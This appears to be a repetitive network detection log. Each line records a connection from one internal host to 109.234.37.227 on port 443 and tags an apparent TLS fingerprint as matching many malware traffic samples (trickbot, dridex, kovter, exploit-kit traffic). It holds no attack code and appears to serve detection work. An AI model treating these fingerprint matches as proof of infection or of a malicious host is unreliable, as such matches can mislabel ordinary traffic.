10.7.21.101 49283 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49286 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49288 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49290 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49292 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49295 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49296 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49297 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49298 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49300 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49301 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49302 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49303 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49304 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49306 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49307 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49308 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49316 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49318 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49326 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49327 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49328 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49330 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49331 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49332 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49333 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49335 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49336 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49337 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49338 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49339 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49341 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49342 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49343 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49344 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49346 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49347 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49348 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49349 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49351 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49352 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49353 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49354 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49355 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49357 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
